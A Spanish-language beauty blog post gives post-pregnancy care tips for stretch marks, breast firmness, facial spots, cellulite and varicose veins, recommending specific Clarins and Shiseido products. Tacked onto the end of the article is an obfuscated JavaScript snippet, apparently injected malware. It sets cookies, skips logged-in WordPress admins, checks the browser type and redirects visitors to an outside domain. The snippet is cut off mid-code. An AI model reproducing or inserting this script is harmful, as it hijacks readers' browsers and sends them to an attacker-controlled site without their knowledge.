Durante la etapa del embarazo, el cuerpo de la mujer sufre una serie de cambios y transformaciones que, ocasiones, no desaparecen después del parto.

El problema principal en la piel después de un embarazo, son las temibles estrías. Pueden eliminarse si son de un color rosado, utilizando por ejemplo este producto de Clarins Soin Complet Spécial Vergetures.

En cuanto al pecho, es muy normal perder elasticidad en esta zona. Para recuperar esa elasticidad perdida, es aconsejable tomar duchas de agua fría y combinarlo con productos específicos para el cuidado del busto como este Clarins Lait Buste Ultra-Fermenté.

No debemos olvidarnos de la manchas en el rostro, ya que son una característica muy común durante el embarazo. Para prevenirlas, utiliza una crema con una alta protección solar y combínalo con un sérum anti-manchas. Os recomiendo éste de Shiseido Intensive Anti-spot sérum.

Otro problema que no viene causado exclusivamente por el embarazo, es la flacidez y la celulitis. Para ello, existen productos en el mercado muy efectivos con resultados impresionantes. Os recomiendo este producto de Shiseido Advanced Body Creator.

Finalmente, otro problema que puede ocurrir tras un embarazo, pero que es más probable que ocurra a partir del segundo embarazo o más, son las anti-estéticas varices. Para tratarlas es imprescindible acudir al médico, ya que deben ser tratadas con técnicas como el drenaje linfático o la presoterápia.

Espero que los consejos y los productos que os recomiendo os sirvan de ayuda y vuestra recuperación post-parto sea lo más gratificante posible. ¡Ánimo mamás vuestra belleza puede seguir intacta! 🙂 var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone